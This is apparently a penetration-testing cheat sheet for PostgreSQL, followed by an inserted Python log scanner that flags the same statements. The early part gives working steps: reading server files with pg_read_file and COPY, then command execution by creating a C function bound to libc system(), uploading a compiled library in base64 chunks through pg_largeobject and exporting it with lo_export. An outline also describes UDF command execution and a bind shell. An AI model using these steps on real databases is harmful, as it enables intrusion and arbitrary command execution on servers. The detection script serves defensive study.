POSTGRESQL

Hacking Postgres https://github.com/nixawk/pentest-wiki/blob/master/2.Vulnerability-Assessment/Database-Assessment/postgresql/postgresql_hacking.md

Basic Knowledge of Postgresql https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9

How to get command execution with 9.x Postgresql https://www.dionach.com/blog/postgresql-9x-remote-command-execution

Download Postgresql https://www.enterprisedb.com/downloads/postgres-postgresql-downloads

Repository https://www.postgresql.org/ftp/source/

select pg_read_file('postgresql.conf');

select pg_ls_dir('./');

Authors: < nixawk >

##############

Read Files

CREATE TABLE word(t TEXT); COPY word FROM '/var/lib/postgresql/flag.txt'; SELECT * FROM word limit 1 offset 0;

##############

#####################################

RAW Steps to command execution

#####################################

On Attacker Machine

gcc -I$(/opt/PostgreSQL/9.6/bin/pg_config --includedir-server) -shared -fPIC -o /opt/pgexec/pg_exec.so /opt/pgexec/pg_exec.c

Now upload the pg_exec.so to the victim machine

On Victim Machine

CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE c STRICT;

\set c0 `base64 -w 0 /tmp/xaa`
INSERT INTO pg_largeobject (loid, pageno, data) values (16420, 0, decode(:'c0', 'base64'));

\set c1 `base64 -w 0 /tmp/xab`
INSERT INTO pg_largeobject (loid, pageno, data) values (16420, 1, decode(:'c1', 'base64'));

\set c2 `base64 -w 0 /tmp/xac`
INSERT INTO pg_largeobject (loid, pageno, data) values (16420, 2, decode(:'c2', 'base64'));

\set c3 `base64 -w 0 /tmp/xad`
INSERT INTO pg_largeobject (loid, pageno, data) values (16420, 3, decode(:'c3', 'base64'));

\set c4 `base64 -w 0 /tmp/xae`
INSERT INTO pg_largeobject (loid, pageno, data) values (16420, 4, decode(:'c4', 'base64'));

\set c5 `base64 -w 0 /tmp/xaf`
INSERT INTO pg_largeobject (loid, pageno, data) values (16420, 5, decode(:'c5', 'base64'));

\set c6 `base64 -w 0 /tmp/xag`
INSERT INTO pg_largeobject (loid, pageno, data) values (16420, 6, decode(:'c6', 'base64'));

\set c7 `base64 -w 0 /tmp/xah`
INSERT INTO pg_largeobject (loid, pageno, data) values (16420, 7, decode(:'c7', 'base64'));

SELECT lo_export(16420, '/tmp/pg_exec.so');
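
The defender's view of the statements above, as an added example that is not part of the original notes: a small scanner that flags them in a PostgreSQL server log. It assumes statement logging is enabled (log_statement); the rule names, the log line prefix and the sample log lines are constructed for illustration.

```python
import re

# Statement shapes taken from the steps on this page; the rule names are
# labels made up for this example.
RULES = [
    ("server_file_read", re.compile(r"\bpg_(?:read_file|ls_dir)\s*\(", re.I)),
    ("copy_from_server_file", re.compile(r"\bCOPY\b[^;]*?\bFROM\s+'", re.I)),
    ("c_function_created", re.compile(
        r"\bCREATE\s+(?:OR\s+REPLACE\s+)?FUNCTION\b.*\bLANGUAGE\s+'?c\b",
        re.I | re.S)),
    ("largeobject_direct_write",
     re.compile(r"\bINSERT\s+INTO\s+pg_largeobject\b", re.I)),
    ("largeobject_export", re.compile(r"\blo_export\s*\(", re.I)),
]

# SQL text after "LOG:  statement:" (simple protocol) or
# "LOG:  execute <name>:" (extended protocol).
LOGGED_SQL = re.compile(r"LOG:\s+(?:statement|execute\s+[^:]+):\s*(.*)$", re.S)

def scan(log_lines):
    """Return (line_number, rule_name, sql) for every rule a line matches."""
    hits = []
    for lineno, line in enumerate(log_lines, start=1):
        m = LOGGED_SQL.search(line)
        if not m:
            continue
        sql = m.group(1).strip()
        hits.extend((lineno, name, sql) for name, rx in RULES if rx.search(sql))
    return hits

# Constructed sample log; PREFIX stands in for an assumed log_line_prefix.
PREFIX = "2024-05-01 10:00:00 UTC [4101] app@shop LOG:  "
SAMPLE_LOG = [PREFIX + s for s in (
    "statement: SELECT id, name FROM products WHERE id = 7;",
    "statement: select pg_read_file('postgresql.conf');",
    "statement: COPY word FROM '/var/lib/postgresql/flag.txt';",
    "statement: CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS "
    "'/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE c STRICT;",
    "statement: INSERT INTO pg_largeobject (loid, pageno, data) "
    "values (16420, 0, decode('AAAA', 'base64'));",
    "statement: SELECT lo_export(16420, '/tmp/pg_exec.so');",
    "execute <unnamed>: select pg_ls_dir('./');",
    "statement: COPY orders FROM STDIN;",
    "statement: CREATE FUNCTION add_tax(numeric) RETURNS numeric AS "
    "'select $1 * 1.2' LANGUAGE sql;",
)]

if __name__ == "__main__":
    for lineno, rule, sql in scan(SAMPLE_LOG):
        print(f"line {lineno}: {rule}: {sql[:60]}")
```

The two benign lines at the end of the sample (COPY FROM STDIN and a LANGUAGE sql function) produce no hits, which is the false-positive case worth checking before alerting on these rules.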

POSTGRESQL HACK#

DATABASE CONNECTION##

Please connect to postgresql database,

DATABASE COMMANDS##

LIST DATABASES###

LIST DATABASE USERS###

Please try more details about postgresql database.

LIST DIRECTORY##

READ FILE##

method1

method2

WRITE FILE##

UDF HACK##

COMPILE SOURCE###

COMMAND EXECUTION###

Transform udf.so into hex strings.

Upload udf.so using database features.

The library is too large, so it has to be split into pieces. Please read https://github.com/sqlmapproject/sqlmap/issues/1170.

Once the library is uploaded successfully, create the PostgreSQL FUNCTION.

Execute commands with sys_exec; nothing is returned.

Please remove the functions after command execution.

BIND SHELL###

Compile the source code,

Copy nc.so to the PostgreSQL tmp path, or upload the .so file using database features.

Create the FUNCTION exec for the bind shell, and then the client connects to the target.

METASPLOIT POSTGRESQL MODULES##

REFERENCES#

https://github.com/sqlmapproject/udfhack/
https://github.com/sqlmapproject/sqlmap/issues/1170
http://zone.wooyun.org/content/4971
http://drops.wooyun.org/tips/6449
http://bernardodamele.blogspot.com/2009/01/command-execution-with-postgresql-udf.html
